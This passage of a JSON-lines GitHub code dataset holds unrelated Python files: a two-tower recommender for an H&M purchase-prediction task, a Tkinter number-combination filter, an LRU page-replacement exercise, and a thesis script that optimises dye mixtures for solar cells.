queries, objects = test_batch\n queries_id_latents = self.queries_embeddings(queries[:, 0])\n queries_purchase_latents = torch.cat(\n [self.objects_embeddings[i](queries[:, i+1]) for i in range(len(ARTICLE_FEATURES_LIST))], dim=-1)\n queries_latents = self.query_net(torch.cat((queries_id_latents, queries_purchase_latents), dim=-1))\n objects_latents = self.object_net(torch.cat(\n [self.objects_embeddings[i](objects[:, i]) for i in range(len(ARTICLE_FEATURES_LIST))], dim=-1))\n logits = torch.matmul(queries_latents, objects_latents.T)\n return torch.topk(logits, topk, dim=1).indices\n\n def loss(self, logits, targets):\n return self.loss_criterion(logits, targets)\n\n\nclass TwoTowerTrainer:\n '''training loop of two tower model'''\n def __init__(self, model, train_dataloader, test_dataloader, epochs, learning_rate, experiment_name=\"two_tower\"):\n self.experiment_name = experiment_name\n self.save_model_path = os.path.join(\n os.environ[\"EXP_DIR\"], f\"{experiment_name}.pt\")\n self.save_plot_path = os.path.join(\n os.environ[\"EXP_DIR\"], f\"{experiment_name}_plot.jpg\")\n self.train_dataloader = train_dataloader\n self.test_dataloader = test_dataloader\n self.epochs = epochs\n self.lr = learning_rate\n self.model = model.train()\n self.opt = torch.optim.Adam(self.model.parameters(),\n lr=learning_rate)\n \n def train(self):\n train_it = 0\n # best_loss = float('inf')\n best_acc = -float('inf')\n losses, val_accs = [], []\n for epoch in tqdm(range(self.epochs)):\n print(f\"Run epoch {epoch}\")\n for batch in tqdm(self.train_dataloader):\n self.opt.zero_grad()\n logits, targets = self.model(batch)\n loss = self.model.loss(logits, targets)\n loss.backward()\n self.opt.step()\n # new_loss = sum(losses[-10:]) / len(losses[-10:])\n if train_it % 500 == 0:\n losses.append(loss.cpu().detach())\n print(f\"It {train_it}: Running Avg Loss: {sum(losses[-10:]) / len(losses[-10:])}\")\n val_acc = self.validate()\n print(f\"It {train_it}: Val Acc: {val_acc}\")\n val_accs.append(val_acc)\n if val_acc > best_acc:\n print(f\"saving checkpoint. 
new best acc: {val_acc}\")\n torch.save(self.model, self.save_model_path)\n best_acc = val_acc\n train_it += 1\n # log the loss training curves\n plt.figure(figsize=(15, 5))\n ax1 = plt.subplot(121)\n ax1.plot(losses)\n ax1.title.set_text(\"loss\")\n ax1 = plt.subplot(122)\n ax1.plot(val_accs)\n ax1.title.set_text(\"train acc\")\n plt.savefig(self.save_plot_path)\n plt.close()\n print(\"Done!\")\n\n def validate(self):\n test_batch = None\n correct = 0\n for batch in self.test_dataloader:\n test_batch = batch\n prediction = self.model.predict(test_batch, int(0.1 * len(test_batch[1])))\n for i in range(len(prediction)):\n correct += 1 if i in prediction[i] else 0\n return correct / len(prediction)\n\n\n\nif __name__ == \"__main__\":\n train = True\n test = True\n\n if train:\n # Init\n experiment_name = \"two_tower_symmetric_net\"\n print(f\"Initializing experiment: {experiment_name}\")\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n epochs = 10000\n val_size = 100\n learning_rate = 5e-4\n\n # Load in training data\n print(\"Loading in training data\")\n transactions_df = get_train_data(cutoff_date=None)\n purchases_df, customers_index_dict, articles_index_dict = get_customer_purchases(\n transactions_df, after=\"2020-08-22\")\n articles_df = pd.read_csv(os.path.join(os.environ[\"DATA_DIR\"], \"articles.csv\"), dtype={\"article_id\": str}).fillna(\"None\")\n articles_features_dicts, num_features, total_features = get_object_features(articles_df)\n article_index_dicts = prepare_object_embed_idxs(articles_df, articles_features_dicts)\n\n print(f\"# unique customer: {len(customers_index_dict)}\")\n print(f\"# unique articles: {len(articles_index_dict)}\")\n print(f\"# unique article features: {total_features}\")\n del transactions_df\n del articles_df\n del articles_features_dicts\n\n with open(os.path.join(os.environ[\"EXP_DIR\"], f\"{experiment_name}_customers_index_dict.pkl\"), 'wb') as f:\n pickle.dump(customers_index_dict, f)\n with open(os.path.join(os.environ[\"EXP_DIR\"], f\"{experiment_name}_articles_index_dicts.pkl\"), 'wb') as f:\n pickle.dump(article_index_dicts, f)\n\n training_purchases_df = purchases_df[:val_size]\n testing_purchases_df = purchases_df[:val_size]\n\n # Make dataset and dataloader\n print(\"Making purchases dataloader\")\n training_purchases_dataset = PurchasesDataset(\n training_purchases_df, customers_index_dict, article_index_dicts, device=device)\n training_purchases_dataloader = DataLoader(\n training_purchases_dataset, batch_size=64, drop_last=True, shuffle=True)\n testing_purchases_dataset = PurchasesDataset(\n testing_purchases_df, customers_index_dict, article_index_dicts, device=device)\n testing_purchases_dataloader = DataLoader(\n testing_purchases_dataset, batch_size=val_size, drop_last=True, shuffle=False)\n\n # Make model and trainer\n print(\"Making model and trainer\")\n two_tower_model = TwoTowerModel(\n len(customers_index_dict), num_features, device=device)\n count_parameters(two_tower_model)\n two_tower_trainer = TwoTowerTrainer(\n two_tower_model, training_purchases_dataloader, testing_purchases_dataloader, epochs, learning_rate, experiment_name)\n\n # Start training\n print(\"Starting training\")\n two_tower_trainer.train()\n\n if test:\n # Init\n experiment_name = \"two_tower_symmetric_net\"\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n # Load model and saved index dictionaries\n print(f\"Loading in model and index dictionaries\")\n model = torch.load(os.path.join(\n 
os.environ[\"EXP_DIR\"], f\"{experiment_name}.pt\"), map_location=device)\n with open(os.path.join(os.environ[\"EXP_DIR\"], f\"{experiment_name}_customers_index_dict.pkl\"), 'rb') as f:\n customers_index_dict = pickle.load(f)\n with open(os.path.join(os.environ[\"EXP_DIR\"], f\"{experiment_name}_articles_index_dicts.pkl\"), 'rb') as f:\n articles_index_dicts = pickle.load(f)\n\n # load in testing data\n print(\"Loading in testing data\")\n conditioning_transactions_df = get_train_data(cutoff_date=\"2020-09-15\")\n conditioning_purchases_df, _, _ = get_customer_purchases(\n conditioning_transactions_df, after=\"2020-08-22\")\n del conditioning_transactions_df\n\n target_transactions_df = get_train_data(cutoff_date=None)\n target_purchases_df, _, _ = get_customer_purchases(\n target_transactions_df, after=\"2020-09-16\")\n del target_transactions_df\n\n articles_df = pd.read_csv(os.path.join(os.environ[\"DATA_DIR\"], \"articles.csv\"), dtype={\"article_id\": str}).fillna(\"None\")\n\n # prepare testing data for prediction\n customers_input = []\n customer_ids = []\n for _, row in conditioning_purchases_df.iterrows():\n customer_ids.append(row[\"customer_id\"])\n customer_embed_id = customers_index_dict[row[\"customer_id\"]]\n customer_most_recent_purchase = articles_index_dicts[row[\"article_id\"][-1]]\n customers_input.append([customer_embed_id, *customer_most_recent_purchase])\n customers_input = torch.tensor(customers_input).to(device)\n print(f\"customers_input.shape: {customers_input.shape}\")\n\n articles_input = []\n article_ids = []\n for article_id in articles_df[\"article_id\"].to_numpy():\n if article_id in articles_index_dicts:\n article_ids.append(article_id)\n articles_input.append(articles_index_dicts[article_id])\n articles_input = torch.tensor(articles_input).to(device)\n print(f\"articles_input.shape: {articles_input.shape}\")\n\n # run predictions\n print(f\"running predictions\")\n print(f\"first and last customers: {customer_ids[0], customer_ids[-1]}\")\n submission = []\n pbar = tqdm(total=len(customer_ids))\n i = 0\n batch = 100\n while i < len(customer_ids):\n predictions = model.predict(\n (customers_input[i:i+batch], articles_input), 12)\n for j, prediction in enumerate(predictions):\n customer_prediction = [article_ids[p] for p in prediction]\n submission.append({\"customer_id\": customer_ids[i+j], \"prediction\": \" \".join(customer_prediction)})\n pbar.update(batch)\n i += batch\n pbar.close()\n\n fieldnames = ['customer_id', 'prediction']\n print(\"Writing predictions\")\n with open(os.path.join(os.environ[\"EXP_DIR\"], f\"{experiment_name}_submission.csv\"), 'w') as csvfile:\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writeheader()\n writer.writerows(submission)","repo_name":"ShivinDass/recsys-kaggle-hnm","sub_path":"csci567/models/two_tower_model.py","file_name":"two_tower_model.py","file_ext":"py","file_size_in_byte":15806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"29318260437","text":"# 创建两个不同的组\nfrom tkinter import *\nfrom tkinter import ttk\nimport os\n\npath = os.getcwd() + \"\\\\number.txt\"\n\nalist = []\n\nfor i in range(10):\n for j in range(i, 10):\n for k in range(j, 10):\n for l in range(k, 10):\n num = (str(i) + str(j) + str(k) + str(l))\n alist.append(num)\n\n\ndef callCheckbutton1():\n print(alist)\n\n\ndef callCheckbutton2():\n alist2 = []\n for i in alist:\n for j in i:\n if i.count(j) > 2:\n if i not in alist2:\n alist2.append(i)\n continue\n for i in 
alist2:\n alist.remove(i)\n print(alist)\n\n\ndef callCheckbutton3():\n alist2 = []\n for eachNumber in alist:\n for i, ele in enumerate(eachNumber):\n if i > 0 and ele == eachNumber[i - 1]:\n if eachNumber not in alist2:\n alist2.append(eachNumber)\n continue\n for i in alist2:\n alist.remove(i)\n print(alist)\n\n\ndef callCheckbutton4(event):\n var = comb.get()\n alist2 = []\n for i in alist:\n if var in i:\n alist2.append(i)\n for i in alist2:\n alist.remove(i)\n print(alist, var, \"callCheckbutton4\")\n\n\ndef callCheckbutton4_2(event):\n var = comb2.get()\n alist2 = []\n for i in alist:\n if var in i:\n alist2.append(i)\n for i in alist2:\n alist.remove(i)\n print(alist, var, \"callCheckbutton4_2\")\n\n\ndef callCheckbutton4_3(event):\n var = comb3.get()\n alist2 = []\n for i in alist:\n if var in i:\n alist2.append(i)\n for i in alist2:\n alist.remove(i)\n print(alist, var, \"callCheckbutton4_3\")\n\n\ndef callCheckbutton4_4(event):\n var = comb4.get()\n alist2 = []\n for i in alist:\n if var in i:\n alist2.append(i)\n for i in alist2:\n alist.remove(i)\n print(alist, var, \"callCheckbutton4_4\")\n\n\ndef callCheckbutton5(event):\n global alist\n var = comb5.get()\n alist2 = []\n for i in alist:\n if var in i:\n alist2.append(i)\n print(alist2, var, \"callCheckbutton5\")\n alist = alist2\n\n\ndef callCheckbutton5_2(event):\n global alist\n var = comb5_2.get()\n alist2 = []\n for i in alist:\n if var in i:\n alist2.append(i)\n print(alist2, var, \"callCheckbutton5_2\")\n alist = alist2\n\n\ndef callCheckbutton5_3(event):\n global alist\n var = comb5_3.get()\n alist2 = []\n for i in alist:\n if var in i:\n alist2.append(i)\n print(alist2, var, \"callCheckbutton5_3\")\n alist = alist2\n\n\ndef callCheckbutton6(event):\n global alist\n var = comb6.get()\n alist2 = []\n for i in alist:\n if int(i[0]) + int(i[1]) + int(i[2]) + int(i[3]) < int(var):\n alist2.append(i)\n print(alist2, \"callCheckbutton6\")\n alist = alist2\n\n\ndef callCheckbutton7(event):\n global alist\n var = comb7.get()\n alist2 = []\n for i in alist:\n if int(i[0]) + int(i[1]) + int(i[2]) + int(i[3]) > int(var):\n alist2.append(i)\n print(alist2, \"callCheckbutton7\")\n alist = alist2\n\n\ndef callCheckbutton8(event):\n var = comb8.get()\n var1 = comb8_2.get()\n alist2 = []\n print(var, var1)\n for i in alist:\n if var in i and var1 in i:\n alist2.append(i)\n for i in alist2:\n alist.remove(i)\n print(alist, \"callCheckbutton8\")\n\n\ndef callCheckbutton8_3(event):\n var = comb8_3.get()\n var1 = comb8_4.get()\n alist2 = []\n print(var, var1)\n for i in alist:\n if var in i and var1 in i:\n alist2.append(i)\n for i in alist2:\n alist.remove(i)\n print(alist, \"callCheckbutton8_3\")\n\n\ndef callCheckbutton8_5(event):\n var = comb8_5.get()\n var1 = comb8_6.get()\n alist2 = []\n print(var, var1)\n for i in alist:\n if var in i and var1 in i:\n alist2.append(i)\n for i in alist2:\n alist.remove(i)\n print(alist, \"callCheckbutton8_5\")\n\n\ndef callCheckbutton8_7(event):\n var = comb8_7.get()\n var1 = comb8_8.get()\n alist2 = []\n print(var, var1)\n for i in alist:\n if var in i and var1 in i:\n alist2.append(i)\n for i in alist2:\n alist.remove(i)\n print(alist, \"callCheckbutton8_7\")\n\n\n# def callCheckbutton9():\n# global alist\n# var = t1.get()\n# a,b,c = var.split(',')\n# alist2 = []\n# for i in alist:\n# if a in i and b not in i and c not in i:\n# alist2.append(i)\n# if b in i and a not in i and c not in i:\n# alist2.append(i)\n# if c in i and a not in i and b not in i:\n# alist2.append(i)\n# alist = alist2\n# 
print(alist, \"callCheckbutton9\")\n\n\ndef callCheckbutton9(event):\n global alist\n a = comb9.get()\n b = comb9_2.get()\n c = comb9_3.get()\n\n alist2 = []\n for i in alist:\n if a in i and b not in i and c not in i:\n alist2.append(i)\n if b in i and a not in i and c not in i:\n alist2.append(i)\n if c in i and a not in i and b not in i:\n alist2.append(i)\n alist = alist2\n print(alist, \"callCheckbutton9\")\n\n\ndef run1():\n with open(path, \"w+\") as f:\n for i in alist:\n f.write(i)\n f.write(\"\\r\\n\")\n\n\nroot = Tk()\nroot.title('数字生成器')\n\nv = StringVar()\n\nvlang = IntVar()\nvos = IntVar()\nvlang.set(1) # 第一个组初始值为1\nvos.set(2) # 第一个组初始值为2\n# 创建两个组,不同的组,各个按钮互不影响。\nLabel(root, text=\"为避免发生错误,以下9个条件,请从上到下进行选择\").grid()\nLabel(root, text=\"\").grid()\nCheckbutton(root, text=\"1.A(0...9)/B(0...9)C(0...9)D(0...9);(四个数都是0-9中选择;)\", command=callCheckbutton1).grid()\nCheckbutton(root, text=\"2.A=B不等于C、D;(只允许两个数相同)\", command=callCheckbutton2).grid()\nCheckbutton(root, text=\"3.A不等于B不等于C不等于D(四个数不同)\", command=callCheckbutton3).grid()\n\nLabel(root, text=\"4.A\\B\\C\\D排除掉一个数,请输入你要排除的数字:\").grid()\ncomb = ttk.Combobox(root, values=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\ncomb.grid()\ncomb.bind(\"<>\", callCheckbutton4)\n\ncomb2 = ttk.Combobox(root, values=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\ncomb2.grid()\ncomb2.bind(\"<>\", callCheckbutton4_2)\n\ncomb3 = ttk.Combobox(root, values=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\ncomb3.grid()\ncomb3.bind(\"<>\", callCheckbutton4_3)\n\ncomb4 = ttk.Combobox(root, values=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\ncomb4.grid()\ncomb4.bind(\"<>\", callCheckbutton4_4)\n\nLabel(root, text=\"5.A\\B\\C\\D中必有一个数,请输入必有的数字:\").grid()\ncomb5 = ttk.Combobox(root, values=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\ncomb5.grid()\ncomb5.bind(\"<>\", callCheckbutton5)\n\ncomb5_2 = ttk.Combobox(root, values=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\ncomb5_2.grid()\ncomb5_2.bind(\"<>\", callCheckbutton5_2)\n\ncomb5_3 = ttk.Combobox(root, values=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\ncomb5_3.grid()\ncomb5_3.bind(\"<>\", callCheckbutton5_3)\n\nLabel(root, text=\"6.四个数之和小于多少,请输入你希望小于的数字:\").grid()\ncomb6 = ttk.Combobox(root, values=[x for x in range(37)])\ncomb6.grid()\ncomb6.bind(\"<>\", callCheckbutton6)\n\nLabel(root, text=\"7.四个数之和大于多少,请输入你希望大于的数字:\").grid()\ncomb7 = ttk.Combobox(root, values=[x for x in range(37)])\ncomb7.grid()\ncomb7.bind(\"<>\", callCheckbutton7)\n\nLabel(root, text=\"8.A\\B\\C\\D不能同时存在的两个数,请输入你选择的第一个数:(每一排对应两个数字)\").grid()\ncomb8 = ttk.Combobox(root, width=15, values=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\ncomb8.grid(row=19, column=0,sticky=W)\ncomb8_2 = ttk.Combobox(root, values=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\ncomb8_2.grid(row=19)\ncomb8_2.bind(\"<>\", callCheckbutton8)\nLabel(root, text=\"\").grid()\ncomb8_3 = ttk.Combobox(root, width=15, values=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\ncomb8_3.grid(row=20, column=0,sticky=W)\ncomb8_4 = ttk.Combobox(root, values=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\ncomb8_4.grid(row=20)\ncomb8_4.bind(\"<>\", callCheckbutton8_3)\nLabel(root, text=\"\").grid()\ncomb8_5 = ttk.Combobox(root, width=15, values=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\ncomb8_5.grid(row=21, column=0,sticky=W)\ncomb8_6 = ttk.Combobox(root, values=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\ncomb8_6.grid(row=21)\ncomb8_6.bind(\"<>\", callCheckbutton8_5)\nLabel(root, text=\"\").grid()\ncomb8_7 = ttk.Combobox(root, width=15, values=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\ncomb8_7.grid(row=22, column=0,sticky=W)\ncomb8_8 = ttk.Combobox(root, values=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\ncomb8_8.grid(row=22)\ncomb8_8.bind(\"<>\", 
callCheckbutton8_7)\n\n\nLabel(root, text=\"9.A\\B\\C\\D中存在下列数之一,请手动输入这三个数:\").grid()\n# t1 = Entry(root)\n# t1.grid(sticky=W)\ncomb9 = ttk.Combobox(root, width=14, values=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\ncomb9.grid(row=24, column=0,sticky=W)\ncomb9_2 = ttk.Combobox(root, width=14, values=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\ncomb9_2.grid(row=24)\ncomb9_3 = ttk.Combobox(root, width=14, values=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\ncomb9_3.grid(row=24,sticky=E)\n# Button(root, text='确定', command=callCheckbutton9).grid(row=24)\ncomb9_3.bind(\"<>\", callCheckbutton9)\n\nButton(root, text='点击查看结果', command=run1).grid()\n\nroot.mainloop()\n","repo_name":"xyh302/Tkinter","sub_path":"createNumber.py","file_name":"createNumber.py","file_ext":"py","file_size_in_byte":9449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"20103961424","text":"\"\"\"wap to implement page replacement policy using\n(A) least recently used (LRU)\n(B) FIFO\n(C) Optimal\n\nmaintain a capacity \ninsert page one by one until the size of the frame reaches the max\nsimultaneously maintain the queue to maintain the \n\nwhoen the next page is not available and replacement is needed\"\"\"\n\n# input - 11212312341234512345665432154321321211\n\nprint('enter string')\ns = list(str(input()))\nprint(s)\nprint('enter size of the frame')\nfsize = int(input())\nframes = []\n\nprint('LRU')\n\nfor i in range(len(s)):\n for j in range(fsize):\n if j == len(frames): break\n if frames[j] == s[i]:\n del frames[j]\n break\n if fsize == len(frames): del frames[0]\n frames.append(s[i])\n print(frames)\n","repo_name":"maniksejwal/College","sub_path":"Sem 6/OS/6. page replacement.py","file_name":"6. page replacement.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"22090730870","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\n\r\nAuthor: Noah Bruno Manz\r\nAffiliation: New Mexico Institute of Mining and Technology, Department of Materials and Metallurgical Engineering\r\nCreated: Thu Jan 20 16:49:13 2022\r\n\r\nMS Thesis Reference:\r\nhttps://www.proquest.com/openview/5e34518343751bc814c51ea0720afd66/1?pq-origsite=gscholar&cbl=18750&diss=y\r\n\r\nLink to Data in Github Repository:\r\nhttps://github.com/noahmanz/Optimizing-the-Combination-of-Natural-Pigments-for-Co-Sensitization-of-Panchromatic-TiO2-DSSCs\r\n \r\n\"\"\"\r\n\r\n################### Import relevant libraries ###################\r\n\r\nimport numpy as np # Version 1.21.6 used\r\nfrom matplotlib import pyplot as plt # Version 3.5.1 used\r\nimport scipy.integrate as integrate # Version 1.7.3 used\r\nfrom scipy.stats import pearsonr # Version 1.7.3 used\r\nfrom scipy import interpolate # Version 1.7.3 used\r\nfrom tqdm import tqdm # Version 4.64.0 used\r\n\r\n\r\n\r\n\r\n################### Import solar irradiance data ###################\r\n\r\n# Import NREL data. 
Wavelength in nm, Irradiance in W*m^-2*nm^-1\r\n# Original data source: https://www.nrel.gov/grid/solar-resource/spectra-am1.5.html\r\nspectrum = np.genfromtxt('NREL_Solar_Irradiance.csv', delimiter = ',')\r\n\r\n# Generate wavelength domain for polynomial regression, 300-800 nm by 1 nm\r\nwavelength = np.linspace(340, 800, 461)\r\n\r\n# If you are dealing with different wavelength domains, adjust line 36 as follows:\r\n# wavelength = np.linspace(lower_bound, upper_bound, upper_bound - upper_bound + 1)\r\n# Note: Ensure that these wavelength limits match those contained in the UVVIS_Absorbance csv files\r\n\r\n\r\n# Calculate polynomial regression of the NREL data\r\nspectrum_regression = np.poly1d(np.polyfit(spectrum[: ,0], spectrum[:, 1], 6))\r\n\r\n# Calculate integral of regression for normalization\r\nspectrum_integral = integrate.trapezoid(spectrum_regression(wavelength), wavelength)\r\n\r\n# Normalized irradiance spectrum\r\nnormal_spectrum = spectrum_regression(wavelength) / spectrum_integral\r\n\r\n# Define function to plot solar irradiance spectrum if allow = True\r\ndef plotsolarirradiance(allow = True):\r\n \r\n if allow:\r\n \r\n plt.figure(0)\r\n plt.plot(wavelength, spectrum_regression(wavelength), color = 'r', linewidth = 3, label = 'Regression')\r\n plt.scatter(spectrum[:, 0], spectrum[:, 1], marker = '.', label = 'NREL Data')\r\n plt.xlabel('Wavelength (nm)')\r\n plt.ylabel('Spectral Irradiance (W*$m^{-2}$*$nm^{-1}$)')\r\n plt.title('AM1.5G Solar Irradiance Spectrum')\r\n plt.legend()\r\n #plt.savefig('Irradiance_Plot_300_800_nm', dpi = 500)\r\n\r\n if not allow: pass\r\n\r\n# Option to plot solar irradiance spectrum\r\nplotsolarirradiance(allow = True)\r\n\r\n\r\n\r\n\r\n################### Generate possible dye combinations ###################\r\n\r\n# Define number of points in volume fraction array. Determines resolution of the volume fraction meshgrid\r\n# Note: N is a user input. Increasing N results in more combinations being evaluated for fitment\r\nN = 11\r\n\r\n# Generate a volume fraction array based on N\r\nv = np.linspace(0, 1, N)\r\n\r\n# Print step size of volume fraction array in console\r\nprint(f\"Resolution of the volume fraction array is: {v[1] - v[0]} \\n\")\r\n\r\n# Generate meshgrid to make coordinate pairs representing all dye combinations\r\nv1, v2, v3, v4, v5, v6 = np.meshgrid(v, v, v, v, v, v, indexing = 'ij')\r\n\r\n# If you are evaluating more than 6 dyes, (e.g 7), adjust line 82 as follows:\r\n# v1, v2, v3, v4, v5, v6, v7 = np.meshgrid(v, v, v, v, v, v, v, indexing = 'ij')\r\n\r\n# Calculate the sum of each coordinate pair at every point\r\nSum = v1 + v2 + v3 + v4 + v5 + v6\r\n\r\n# If you are evaluating more than 6 dyes, (e.g 7), adjust line 88 as follows:\r\n# Sum = v1 + v2 + v3 + v4 + v5 + v6 + v7\r\n\r\n# Boolean logic to remove impossible combinations. 
Returns true only when Sum=1\r\ncondition = Sum == 1\r\n\r\n# Use boolean on meshgrid to only return coordinate pairs that sum to 1\r\nV1 = v1[condition]\r\nV2 = v2[condition]\r\nV3 = v3[condition]\r\nV4 = v4[condition]\r\nV5 = v5[condition]\r\nV6 = v6[condition]\r\n\r\n# If you are evaluating more than 6 dyes, (e.g 7), add the following after V6:\r\n# V7 = v7[condition]\r\n\r\n# Print total number of dye combinations in console\r\nprint(f\"The total number of combinations is: {len(V1)} \\n\")\r\n\r\n\r\n\r\n\r\n################### Generate RBF Interpolation Functions ###################\r\n\r\n# Import volume fractions file corresponding to each analyzed dye combination\r\n# Note: This is a .csv file containing any dye combinations for which UV/VIS data was collected\r\n # Volume fractions of constituents should populate columns with each combination populating a new row\r\nvolume_fractions_w_header = np.genfromtxt('Emperical_Dye_Solutions_Volume_Fractions.csv', delimiter = ',')\r\n\r\n# Delete header and first column with variable labels\r\nvolume_fractions = np.delete(np.delete(volume_fractions_w_header, 0, 0), 0, 1)\r\n\r\n# Import the corresponding UV VIS [absorbance] data and set any negative values to zero\r\n# Note: This is the spectral UV/VIS data corresponding to each combination in \"Independent_Variables.csv\"\r\n # Each combination populates a column with wavelength values corresponding to individual rows\r\n # Either the anode adsorbed or bulk solution data can be passed as an argument here\r\ndata_w_header = np.clip(np.genfromtxt('UVVIS_Absorbance_Bulk_Solution.csv', delimiter = ','), 0, None)\r\n\r\n# Delete header row with labels\r\ndata = np.delete(data_w_header, 0, 0)\r\n\r\n# Break the volume fraction matrix into individual vectors corresponding to each constituent dye\r\nd1 = volume_fractions[:, 0]\r\nd2 = volume_fractions[:, 1]\r\nd3 = volume_fractions[:, 2]\r\nd4 = volume_fractions[:, 3]\r\nd5 = volume_fractions[:, 4]\r\nd6 = volume_fractions[:, 5]\r\n\r\n# If you are evaluating more than 6 dyes, (e.g 7), add the following after d6:\r\n# d7 = volume_fractions[:, 6]\r\n \r\n# Create storage array to hold all RBF models\r\nRBF = []\r\n\r\n# Iterate through \"data\" and generate all 461 RBF models\r\nfor index, _ in enumerate(data):\r\n \r\n # Calculate an RBF interpolation of \"data\" for each wavelength\r\n interpolation = interpolate.Rbf(d1, d2, d3, d4, d5, d6, data[index, :], function = 'inverse')\r\n \r\n # If you are evaluating more than 6 dyes, (e.g 7), adjust line 150 as follows:\r\n # interpolation = interpolate.Rbf(d1, d2, d3, d4, d5, d6, d7, data[index, :], function = 'inverse')\r\n \r\n # Append this result to the RBF list\r\n RBF.append(interpolation)\r\n \r\n\r\n# Define function F to return the RBF model over entire wavelength domain\r\n\r\ndef F(I1, I2, I3, I4, I5, I6):\r\n \r\n # If you are evaluating more than 6 dyes, (e.g 7), adjust line 161 as follows:\r\n # def F(I1, I2, I3, I4, I5, I6, I7):\r\n \r\n # Create temporary storage vector to hold the results of the RBF model\r\n temp_storage = []\r\n \r\n # Iterate through the UV/VIS dataset\r\n for index, _ in enumerate(data):\r\n \r\n # Evaluate the RBF model\r\n RBF_absorbance_value = RBF[index](I1, I2, I3, I4, I5, I6)\r\n \r\n # If you are evaluating more than 6 dyes, (e.g 7), adjust line 173 as follows:\r\n # RBF_absorbance_value = RBF[index](I1, I2, I3, I4, I5, I6, I7)\r\n \r\n # Convert absorbance to LHE and append to storage vector\r\n # Note: LHE = 1 - Trans. 
--> LHE = 1 - 10 ^ -Abs.\r\n # Reference: http://www.rsc.org/suppdata/ee/c2/c2ee22854h/c2ee22854h.pdf\r\n temp_storage.append(1 - 10 ** (- RBF_absorbance_value))\r\n \r\n # Return the storage vector when F is called\r\n return np.array(temp_storage)\r\n\r\n\r\n\r\n\r\n################### Loop through all dye possible combinations ###################\r\n\r\n# Create empty array to store correlation fit data\r\ncorrelation = []\r\n \r\n# Create empty array to store fit data\r\nintegral = []\r\n \r\n# Create empty array to store fit data\r\ncovariance = []\r\n\r\n# Loop through all rows in volume fraction meshgrid\r\nfor f1, f2, f3, f4, f5, f6 in tqdm(zip(V1, V2, V3, V4, V5, V6), desc = \"Evaluating combinations\", total = len(V1)):\r\n \r\n # If you are evaluating more than 6 dyes, (e.g 7), adjust line 201 as follows:\r\n # for f1, f2, f3, f4, f5, f6, f7 in tqdm(zip(V1, V2, V3, V4, V5, V6, V7), desc = \"Evaluating combinations\", total = len(V1)):\r\n\r\n\r\n ################### Find the Pearson Correlation for all combinations ###################\r\n\r\n # Calculate correlation between solar irradiance and F evaluated at fractions f1-f6\r\n corr = pearsonr(spectrum_regression(wavelength), F(f1, f2, f3, f4, f5, f6))\r\n \r\n # If you are evaluating more than 6 dyes, (e.g 7), adjust line 210 as follows:\r\n # corr = pearsonr(spectrum_regression(wavelength), F(f1, f2, f3, f4, f5, f6, f7))\r\n \r\n # Append the previous value to the correlation storage array\r\n correlation.append(corr[0])\r\n \r\n\r\n ################### Find the integral value for all combinations ###################\r\n\r\n # Define function to return the integral of the RBF model over domain\r\n def I(I1, I2, I3, I4, I5, I6):\r\n \r\n # If you are evaluating more than 6 dyes, (e.g 7), adjust line 222 as follows:\r\n # def I(I1, I2, I3, I4, I5, I6, I7):\r\n \r\n return integrate.trapezoid(F(I1, I2, I3, I4, I5, I6), wavelength)\r\n \r\n # If you are evaluating more than 6 dyes, (e.g 7), adjust line 227 as follows:\r\n # return integrate.trapezoid(F(I1, I2, I3, I4, I5, I6, I7), wavelength)\r\n\r\n # Integrate F evaluated at fractions f1-f6\r\n integ = I(f1, f2, f3, f4, f5, f6)\r\n \r\n # If you are evaluating more than 6 dyes, (e.g 7), adjust line 233 as follows:\r\n # integ = I(f1, f2, f3, f4, f5, f6, f7)\r\n \r\n # Append the previous value to the integral storage array\r\n integral.append(integ)\r\n\r\n\r\n ################### Find the covariance for all combinations ###################\r\n\r\n # Calculate covariance between solar irradiance and F evaluated at fractions f1-f6\r\n cov = np.cov(spectrum_regression(wavelength), F(f1, f2, f3, f4, f5, f6))\r\n \r\n # If you are evaluating more than 6 dyes, (e.g 7), adjust line 245 as follows:\r\n # cov = np.cov(spectrum_regression(wavelength), F(f1, f2, f3, f4, f5, f6, f7))\r\n \r\n \r\n # Append the previous value to the covariance storage array\r\n covariance.append(cov[0, 1])\r\n\r\n\r\n\r\n\r\n################### Find characteristic values in correlation, integral & covariance arrays ###################\r\n\r\n\r\n################### Find best Pearson Correlation fit ###################\r\n\r\n# Store the maximum values of 'correlation' in a new array\r\ncorrelation_answer = list(np.where(correlation == max(correlation)))\r\n\r\n# Check if there are muliple maximum values in 'correlation'\r\nif len(correlation_answer) > 1:\r\n print('There are multiple correlation best fits. 
